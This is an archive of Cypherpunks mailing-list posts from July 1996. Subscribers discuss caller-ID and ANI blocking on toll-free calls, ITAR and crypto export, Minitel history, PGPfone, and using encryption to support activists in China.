about those local companies who still had you call a 1-800 number.  Guess
what.  That was the easiest (and sometimes the cheapest) way to get ANI.
I ran a Harris 20/20 PBX switch for a company over 6 years ago and remember
looking over and discussing the ANI specs with the management.  We decided
not to pursue trying to get ANI on our DID lines but the switch supported
it and that switch was considered out of date technology at THAT time!

> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Victor M. Hernandez" <pgjeags@infosel.net.mx>
Date: Sat, 13 Jul 1996 13:58:21 +0800
To: cypherpunks@toad.com
Subject: asking for beeing in your mailing list
Message-ID: <31E6FEA8.799@infosel.net.mx>
MIME-Version: 1.0
Content-Type: text/plain


I would ask for being include in your mailing list
How can I do that?

thanks in advance
-- 
 //// 
~O¿O~
pgjeags@infosel.net.mx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 13 Jul 1996 12:43:29 +0800
To: Eric Murray <dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Can't block caller ID in Massachusetts?
Message-ID: <2.2.32.19960712234433.0082448c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 7/12/96 -0700, Eric Murray wrote:
>When I called the Pac Bell customer service droids to get my "complete"
>blocking I asked them why they won't block CID to 800 numbers.
>Their answer: "that's just the way it works". 

Since they can't bill you for LD numbers you call without reporting the
calls on your bill, they can't charge 800 (or pay 900) number owners without
reporting which numbers called them.

I suppose you could just trust them (like the UK) and not demand a list of
numbers you called and then the 800/900 businesses might do the same.  Likely?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sat, 13 Jul 1996 12:17:32 +0800
To: CP <cypherpunks@toad.com>
Subject: Quantum Communications
Message-ID: <9607121946.aa22045@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


	By mistake, I sent a message in reply to a list member and
forgot to include the list.

	I also misremembered *Austria* as Australia when I sent my
original question to the list.

	The item I read was a news item on the bottom of p.16, July 6
Issue of _New Scientist_, enititled "It's good to talk in quantum
trits". The researchers are Klaus Mattle, Harald Weinfurter and Anton
Zeilinger of the University of Innsbruck and Paul Quiat of Los Alamos
National Laboratory in New Mexico. Weinfurter said "It's the first
experiment which demonstrates a communications system using pure
quantum states".

	I don't know enough QM to tell if it has the same immunity to
eavesdropping as the scheme studied by British Telecom.

	I'll send more details tomorrow, as I have to leave now.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 13 Jul 1996 14:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts? (fwd)
Message-ID: <199607130140.UAA11180@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Subject: Re: Can't block caller ID in Massachusetts?
> Date: Fri, 12 Jul 1996 19:37:42 -0400 (EDT)
> From: "Michael H. Warfield" <mhw@wittsend.com>
> 
> Eric Murray enscribed thusly:
> 
> > Caller ID isn't for people, it's for businesses who want to
> > track callers.  They're willing to pay for that service, enough
> > to make it worth the while of the phone companies to spend many
> > millions on a campaign of lies (excuse me, "PR") to convince us
> > that we need CID for "safety".
> 
> number was to be able to log and track that information.  Every wonder
> about those local companies who still had you call a 1-800 number.  Guess
> what.  That was the easiest (and sometimes the cheapest) way to get ANI.
> I ran a Harris 20/20 PBX switch for a company over 6 years ago and remember
> looking over and discussing the ANI specs with the management.  We decided
> not to pursue trying to get ANI on our DID lines but the switch supported
> it and that switch was considered out of date technology at THAT time!
> 

I can verify this ability of telephone switches and number tracking. From
1984 to 1990 I worked for the University of Texas at Austin in their
Physical Plant Telco shop. I worked on a NT SL-1 based switch feeding voice,
data, and analog signals all over campus as well as interfacing to SWBT's
trunk lines.

I personaly used the system to track on campus phreak and hack attacks as
well as feeding the universities computerized security system. We used a
Charles Rivers 68/35 running building control software. With it we could
track various aspects of the telephone switch and log them offline. We used
the system strictly for input of signals for physical security (ie door
switches, mag-locks, PIR's, etc.) over the dry pair of the switch.

Watch your 6's.

                                                 Jim Choate
                                                 CyberTects
                                                 ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 13 Jul 1996 17:58:20 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.BSI.3.91.960712215349.856B-100000@wichita.fn.net>
Message-ID: <Pine.SUN.3.91.960712211341.5217E-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 12 Jul 1996, Bruce M. wrote:

>     I've heard rumors that some carriers pull their ANI information from 
> CID thereby enabling you to block it just like you would the normal 
> signal.  Other methods of remaining anonymous can be achieved by going 
> through long distance companies that don't pass on ANI information or 
> paying companies who offer you ANI blocking dial-throughs.

Another way to defeat ANI or whatever is to call 800 numbers by
using a pre-paid calling card.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 13 Jul 1996 14:47:00 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Can the inevitability of Software privacy be used to   defeat the ITAR?
In-Reply-To: <Pine.LNX.3.94.960712130335.171A-100000@gak>
Message-ID: <Pine.SUN.3.94.960712211853.13922F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hey folks, let's be real clear about this:

The ITAR do NOT apply to books.

Repeat:

The ITAR do NOT apply to books.   

On Fri, 12 Jul 1996, Mark M. wrote:
[...]
> This isn't quite analogous to the original problem of a software company making
> good-faith efforts to prevent a program from being exported.  AFAIK, MIT did
> not try to prevent the book from being exported (of course, the State
> Department never did approve or deny their request to export the book).  Sandia

State told Karn that it did not have jurisdiction over books.

> could claim that MIT came very close to violating ITAR, but the same claim

"The ITAR do not apply to books"

> could not be made if the issue was a software program which was
> export-controlled.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 13 Jul 1996 08:52:17 +0800
To: Daniel Salber <cypherpunks@toad.com
Subject: Re: Minitel "saved" by hackers?
Message-ID: <1.5.4.32.19960712212426.002e925c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 05:51 12/07/96 +0200, Daniel Salber wrote:
>At 2:37 AM +0500 on 7/11/96, Arun Mehta wrote:
>
>> I'd love to find out exactly what happened.
>
>"Hacking" is inaccurate: the users
>were not necessarily computer-litterate but just found another way to use
>the help feature of the server. Rheingold's Virtual Community has a pretty
>accurate account of the facts (see chapter 8, also online as
><http://www.well.com/user/hlr/vcbook/vcbook8.html>).

Thank you for the correction. I checked Andre Lemos' original, and he uses
both terms. To quote, "Through thie detournement -- literally, a 'hijacking'
was born the messagerie. By hacking and then making available the bulletin
board software, a counter-current to the French technocratic approach
produced a usage of the system which was never a planned objective."
Slightly inaccurate.

>In a previous post, you said:
>
>> So, shocked by this, what does the government do? Being unable to
>> distinguish between different kinds of messageries, the government put a 30%
>> tax in 1989 on all, and raised it to 50% in 1991! No wonder the Internet is
>> gaining rapid popularity in France.
>
>I think this is wrong. These taxes were only for sex messageries and the
>30% tax didn't actually stop most of them from making money. I think the
>50% tax wasn't actually enforced and the tax rate remains at 30% (see
>http://www.univ-paris8.fr/~babelweb/voltaire/v_no23.htm -- this is in
>french, sorry).
>
>You must realize that the government has no interest in stopping all
>messageries: France Telecom is (at least for the coming few months) a
>government agency and makes a lot of money from the messageries.

Once again going back to the original: "In 1986 the first roadside
billboards for the messaggeries rose appeared (picturing, for example, a
robust male or a woman with slogan '3515 BUSTY', the online address of a
Mintel rose chat service). French traditionalists were outraged and Charles
Pasqua, acting Minister of the Interior, attacked the gay messagerie Gay
Pied. Worse, the French state gains 36% of the total charges paid. Taxes on
all the messagerie services became the order of the day. France Telecom has
no way of distinguishing between the messagerie rose and any other board or
messagerie. In 1989 the government tax was 30% and in 1991 a 50% tax was
imposed in the hope of eliminating all messageries."

That's seriously innacurate, it seems to me: but I would appreciate some
confirmation before I attack the guy in my review. Will check out the urls
you suggested, problem is during the monsoons the phone connection to my ISP
keeps dropping.

>
>The Minitel is no more "centralized and bureaucratic" than the Internet was
>only a while ago (ie, when NSF was in charge of most of the core
>infrastructure).
>The Minitel may look centralized and bureaucratic because anyone who wishes
>to open a server has to go through France Telecom (which delivers unique
>names like Internic).

Has FT ever denied permission (to hard-core sex servers or neo-Nazis, for
example)? That, the tax they charge and the prohibition of encryption make
it too centralized for my taste. And will ultimately kill it. The longer the
French take to migrate to the Internet, the worse for them (IMHO).

>There were even some experiments of a european Minitel system linking
>several european videotex services a few years ago. I think they fell short
>because the videotex technology has been so quickly outdated.

Why not link up videotex in every country with the Internet? Let people surf
the Web using their TVs and remotes (and maybe a keyboard with an infra-red
link). That's what I'm trying to tell our utter failure of a videotex
service in India.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 13 Jul 1996 08:36:15 +0800
To: Will Price <cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <1.5.4.32.19960712212459.002e11b0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 23:38 10/07/96 -0700, Will Price wrote:
>ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download

Sorry if this has been discussed before (please point me in the right
direction if that is the case), but VSNL, my government-owned ISP (which
also has a monopoly on all international traffic) made me sign that I will
not use my Internet connection for voice traffic. Is there any way they
could find out if I were using PGPfone, or rather, could I prevent them from
finding out?
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Sun, 14 Jul 1996 21:07:04 +0800
To: "'cypherpunks@toad.com>
Subject: Stuffs used for detection
Message-ID: <01BB71A5.FB7DF8A0@ip138.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


In our school library, there is a depository area wherein you deposit your things and get the tag. Since the library doesn't allow those tags to be brought out from the library, everytime you brought it out and pass by the door, it will alarm. Does anyone know what stuff is that? How come it is alarmed? I brought some metals but it wouldn't alarm... Why those tag would alarm them???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 13 Jul 1996 16:27:38 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <Pine.BSI.3.91.960712215349.856B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 1996, David Mazieres wrote:

> They said no problem, but...  They said nothing I can do will block it
> when I call 800 numbers.  "The people with 800 numbers have special
> software, and there is nothing you can do to block your identity when
> calling them.  Not even *67."
> 
> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.
> 
> I know 800 number owners probably used to be able to get lists of
> calling phone numbers on their phone bills, but this is less
> disturbing as it would take significant effort to match up the lists
> after the fact.  I just want to be able to call up companies and say,
> for instance, "If I buy your product, can it do X?" as opposed to, for
> instance, "I'm stuck with your product, can it do X?".  People are
> often more helpful in the former case.  Now, though, they'll know
> exactly who I am before they even say hello.

    This is nothing new.  800, 900 and some other similiar numbers have 
been able to subscribe to a service called Automatic Number 
Identification (ANI) for many years now.  While it is related to Caller 
ID, it doesn't operate with necessarily the same restrictions/options.  
Many companies use ANI in addition with special software to actually look 
at where you are calling from and either pull up your records, transfer 
you to a region specific extension, etc.

    I've heard rumors that some carriers pull their ANI information from 
CID thereby enabling you to block it just like you would the normal 
signal.  Other methods of remaining anonymous can be achieved by going 
through long distance companies that don't pass on ANI information or 
paying companies who offer you ANI blocking dial-throughs.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@mockingbird.alias.net (Anonymous)
Date: Sat, 13 Jul 1996 18:36:57 +0800
To: cypherpunks@toad.com
Subject: Re: DES & IDEA built right into the Linux kernel...
In-Reply-To: <m0ue5GK-000HE6C@hackvan.com>
Message-ID: <199607130507.WAA25103@myriad>
MIME-Version: 1.0
Content-Type: text/plain


> Nicholas Leon <nicholas@binary9.net> has created tools that allow DES
> and IDEA encryption at the device level for the Linux kernel.  Some of
> the patches are in the 2.0.4 kernel, and the rest can be found at
>
>     http://www.binary9.net/nicholas/linuxkernel/patches/


Yep, you can mount encrypted files or partitions as filesystems. (sorta
like securedrive/securedevice for messydos.)  Nifty stuff...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Jul 1996 15:16:56 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Can the inevitability of Software privacy be used to   defeat the ITAR?
In-Reply-To: <Pine.SUN.3.94.960712211853.13922F-100000@viper.law.miami.edu>
Message-ID: <Pine.LNX.3.94.960712221029.771B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jul 1996, Michael Froomkin wrote:

> Hey folks, let's be real clear about this:
> 
> The ITAR do NOT apply to books.
> 
> Repeat:
> 
> The ITAR do NOT apply to books.   

I'm quite aware of this fact, and I never did say that ITAR did apply to books.
I just noted that a claim that MIT came _very close_ to violating ITAR by
publishing a book with complete source code in OCR'able text is more legitimate
than a claim against a software company that makes a good faith effort to
prevent a crypto program from being exported.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMecGkbZc+sv5siulAQH1VQQAh26lrtY9HAr3r4xrf/ZeyXZZ2QZbzOp6
Tjz6yjH+PH78pET0Egjd+QppuLXVxilukY2A2k8c/SNtzHjVX37HvmOT08xRwEi+
cUn9OwJ6QEGYtNe3iPyeLFRklkt0O283LX11CBrXSp3t052BgqaZyEtHn+G5M3dd
X8G7hkphtis=
=8vbw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sentiono Leowinata" <sentiono@cycor.ca>
Date: Sat, 13 Jul 1996 15:39:15 +0800
To: "cypherpunks@toad.com>
Subject: Good dictionary files?
Message-ID: <199607130216.XAA15487@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


As many people say, a good password cracker is very dependent on the
dictionary file(s). When one has a very good dictionary file(s), the
chances of password being cracked is bigger. I am wondering if
someone can tell me where I can get good dictionary file(s). Search
on the web result to nothing. I have one large dictionary file (about
14Mb) to check it, but I still not feel comfortable to say it's a
good one. 
This might be off topic from cryptography, but until we can reverse
engineer (decrypt the crypt or crypt(3)) functions, nothing we can do
but to rely on those good dictionaries. 
Thank you and I apologize for anyone who might get offended by my
post.
Regards,
Sent.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Jul 1996 18:58:21 +0800
To: Michael Froomkin <markm@voicenet.com>
Subject: Re: Can the inevitability of Software privacy be used to   defeat the ITAR?
Message-ID: <199607130624.XAA24879@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:21 PM 7/12/96 -0400, Michael Froomkin wrote:
>> could claim that MIT came very close to violating ITAR, but the same claim
>
>"The ITAR do not apply to books"

I'm not sure the exact legalities apply here.  I think it is more like the
mob pressuring business men for protection and punishing those who do not
comply.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 13 Jul 1996 17:44:58 +0800
To: cypherpunks@toad.com
Subject: Re: ANI Blocking! Fast, Easy, Effective! (fwd)
Message-ID: <Pine.BSI.3.91.960712234003.18385A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain




> ---------- Forwarded message ----------
> Date: Thu, 4 JUL 1996 14:48:28 GMT 
> From: Glen L. Roberts <glr@ripco.com>
> Newgroups: alt.2600, alt.privacy, alt.private.investigator, 
> alt.dcom.telecom,
>    comp.dcom.telecom.tech, alt.security, misc.consumers
> Subject: ANI Blocking! Fast, Easy, Effective! 

> We are in the beta teating phase of a new service to block ANI.
> You'll be able to call any toll-free number and prevent them from
> getting your phone number. We do not charge for this service (you
> do have to call a long distance number).

> Complete details are on our web page. As we are beta testing, we
> can't say for such what problems might crop up, but let us know.

> http://pages.ripco.com:8080/~glr/block.html


> ------
> Purity of Opinion through force of Intimidation:
> http://pages.ripco.com:8080/~glr/rogue
> Web Site for FBI File Access! You, too can be like Pres Clinton!
> http://pages.ripco.com:8080/~glr/fbi.html
> ------

    I thought this might be of interest due of the recent discussions 
about ANI and privacy.  I've seen this type of service before, but this 
one is apparently free (besides the cost of calling their area code if 
you aren't local).

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 13 Jul 1996 17:37:42 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960712211341.5217E-100000@crl8.crl.com>
Message-ID: <Pine.BSI.3.91.960712234635.23525A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 1996, Sandy Sandfort wrote:

> On Fri, 12 Jul 1996, Bruce M. wrote:
> 
> >     I've heard rumors that some carriers pull their ANI information from 
> > CID thereby enabling you to block it just like you would the normal 
> > signal.  Other methods of remaining anonymous can be achieved by going 
> > through long distance companies that don't pass on ANI information or 
> > paying companies who offer you ANI blocking dial-throughs.
> 
> Another way to defeat ANI or whatever is to call 800 numbers by
> using a pre-paid calling card.

    It would still be possible for the LD company to just pass through 
your information for ANI, although I wonder what percentage actually do.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Sat, 13 Jul 1996 17:11:32 +0800
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <m0ueo3G-0001qwC@wittsend.com>
Message-ID: <Pine.SUN.3.91.960713001239.14285A-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I wrote David backchannel about this, explaining it in lurid detail.

Now, to the whole list, if you didn't know,

Here's how you STOP the 800 people from getting your number:

DIAL THE OPERATOR and have her put the call through...

Take Care,
Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 17:25:51 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Another bad idea
Message-ID: <199607130436.AAA15446@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 10:23, Alan Olsen wrote:
[..]
> Of course this is all a moot point, because it has been proven by computer
> projections that all informative net traffic will be buried under
> advertisements by the year 2000 anyways.  I expect some legislative body to
> try and make money fast on the net by selling ad space on IP packet headers.

Yes. They can follow the American model and rather than censor 
communications, allow advertising.  Nobody will be able to get an 
inteeligent thought from the net without being interrupted by an ad 
every five minutes... and people will pay good money for this 
'privledge' (sp?) too.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 17:30:01 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Another bad idea
Message-ID: <199607130436.AAA15452@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Note that my main point was sort-of vague.  Let me re-iterate it: 
crypto-activism should go along with the other activism for 
democratizing countries like China, Iraq, Burma, etc.  Most of the 
activists involved with those issues know about the culture (and many 
are already PGP-aware)... so for specific situations some of the 
ideas presents may not be appropriate for others.  It might be ok to 
direct-mail someone in one country, but dangerous for someone in 
another.

Also don't take for granted the relative access of privacy one has in
the US or Europe compared to some regime where you can 
only net surf with a policement watching over your shoulder at the 
police station's internet kiosks (hypothetical...).  Using an 
anonymous remailer or web anonymizer may be reason enough to get 
somebody in another country in trouble.

The thought of  blindly being a k00l krypt0 activist and getting some
poor guy in another country thrown in jail doesn't do much to help
democratize that country.

Spam and unsolicited mail aren't the way to go.  Better, more subtle 
ideas, might be to say 'check out this page' ot 'i've got source code 
for that on my page at...', which has techie or  even entertainment info
but also has political info (that already happens quite 
unintentionally).

I wonder what web users in places like Singapore thought when they 
kept running across blacked-out anti-CDA pages...

If one is familiar with the culture, one can even be really subtle 
and seem to be talking about an unreleated story or even techie or 
sports but actually be discussing the political situation in that 
country (look at many Soviet films, some Chinese films, Spanish films 
under Franco's regime, Cuban films, etc.)


On 12 Jul 96 at 18:30, E. ALLEN SMITH wrote:
[..]
> 	If these countries didn't value their technical people and what they
> can do, they wouldn't be allowing them on the Internet (even in a restricted
> way) in the first place. The above would only be a likely scenario if the
[..]
Don't underestimate people's stupidity.  The party loyalists or 
bootlickers may get away with more naughtiness on the 'net, but those 
borderline techies who are about due for another month at a 
re-education camp or loyalty counseling may get screwed. If such 
countries really valued their techies, then why do they allow them to 
emmigrate to Western countries?

[..]
> 	How, precisely, is one going to filter out graphics from web sites in
> Chinese? Ascii text and ideographs don't exactly get along. One interesting
[..]
By filtering out all photographs, which from what I heard the Chinese 
were contemplating.  Whether is it truly feasible is another matter, 
of course.  But since when has infeasability prevented anyone from 
trying it?

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 13 Jul 1996 13:34:34 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Destabilizing China's Government with Strong Crypto
Message-ID: <1.5.4.32.19960713003051.002f9dac@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 12/07/96 +0000, Deranged Mutant wrote:
>On 12 Jul 96 at 9:40, Arun Mehta wrote:
>[..]
>BTW, similar problems in Iran fro what I've heard.  I remember 
>hearing a blurb that VOA Chinese Programs explained how to make a 
>setellite dish out of aluminum foil, so pick up special VOA 
>boradcasts I'm sure... (That's rather intersting, because you can 
>crumple it up or wrap leftovers in it immediately.)

Is there a good hacker handbook, telling you how you can do things your
government won't let you, something along the lines of a modern-day Abbie
Hoffman "Steal This Book"? 
<grin, salivate>

>I'm told by some friends that the Chinese, in large part due to the 
>writing system, prefer FAXs over the internet.  That's something to 
>keep in mind.
>
>Hm... interesting project: a graphics program that works with PGP or 
>PGPlib.  One can import scanned images or draw onto the screen and 
>then encrypt it for mailing.

Excellent project. One reason that e-mail is picking up in popularity is
that sending a fax to the office address is like sending a postcard. 

>> 1) Collect the e-mail addresses as Allen suggested (including those in
>> Hongkong), and send them a single, short message offering to teach them free
>> of cost how to use pgp and all the goodies at
>> http://www.eskimo.com/~joelm/cbsw.html
>
>Might be condescending.  'Civilized white man brings PGP to the 
>barbarians...' 

Look around you: while "civilized", "white" and "man" might characterize the
vast (?) majority on this list, I'm sure that's not the universe on
cypherpunks. And how does it matter? I'm suggesting an e-mail course that
people may subscribe to if they wish. I'm currently attending a course on
Cyberspace-Law for Non-Lawyers, presented by the  Cyberspace Law Institute
and Counsel Connect with thousands of others
<http://www.counsel.com/cyberspace> -- I'm sure there are people from all
continents 
on that course, and the question of it being condescending hasn't arisen.

> They may well know about PGP, but not in a position 
>to make that knowledge widely known.

That's no good to the rest of the world. Forget them: the question is,  are
*you* in a position to share your knowledge?

>And if I were in a 'totalitarian' or restrictive country I'd be damn
suspicious,
>maybe frightened by this ('are the secret police setting me up?' or 'will the
>notice if I reply?'). 

Maybe lesson 1could be on how to use an encrypting anonymous remailer, and
those who succeed get lesson 2 onwards untraceably.  If they are suspicious,
they don't have to join or can unsubscribe.

>What if that person like the way their country is?  They 
>could inform the local authorities and set in motion a crackdown that 
>would not have happened, perhaps.

We say *nothing* during the course about what we feel about the political
situation in Singapore, the work situation in multinationals or Bill
Clinton. We restrict the course to a sharing of knowledge on crypto in the
Internet spirit of a free economy.

>I'd leave the specifics to activists who are already familiar with 
>the respective cultures, societies, politics, etc.... 

I'm one. Be glad to tell you more,...

>chances are they
>are already doing things along those lines. 

If they are, its only in pockets,  and they are doing an awful job of
telling people about it if none of us has heard. The Internet is still very
new here, most people don't know much about it except how to click the porn
bookmarks.

>Otherwise, if you don't 
>know what you're doing, you can unintentionally mess up somebody 
>else's life, if not your own.

It's only crypto, not the Bible or Koran. And let them be their own judges?
You seem to want to protect people in the Third World the way the US
government wants to keep cyberporn from kids.


From: tcmay@got.net (Timothy C. May)
Subject: Destabilizing China's Government with Strong Crypto
Sender: owner-cypherpunks@toad.com

>At 4:40 AM 7/12/96, Arun Mehta wrote:
...
>>2) Encourage the production of simple, cheap devices such as a PGP phone

<cited material snipped>

>>3) Find people who beam radio transmissions into China (Rupert Murdoch via
>>his Star TV satellite is one ;-) and ask them to devote an "Internet hour"

<cited material snipped>

>Good ideas, all. And deploying steganography is a natural fit to this
situation.

Thanks,  mate. What's the use of all the theory you develop and software
you'll write if it is inaccessible to those who need it most? Just think:
you work in a sensitive job, have a bad conscience about all the forests
that are being cut on account of collusion between the Forest Department and
the illegal loggers -- now you can maybe talk to someone about the weather
or the greatness of Kim Jong Il,  and in the process upload all you know
about the scandal, untraceable to you. 

From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>

>: 1) Collect the e-mail addresses as Allen suggested (including those in
>: Hongkong), and send them a single, short message offering to teach them free
>: of cost how to use pgp and all the goodies at
>: http://www.eskimo.com/~joelm/cbsw.html
>
>Unfortunately for those of us in the United States or who are
>otherwise subject to its jurisdiction such an offer would require a
>license or a waiver of jurisdiction under the International Traffic in
>Arms Regulations before it could safely be carried out.  That
>particular highly worthwhile project would seem to fall under the
>definition of performing defense services as well as involving the
>disclosure of technical data relating to an item on the United States
>Munitions List.

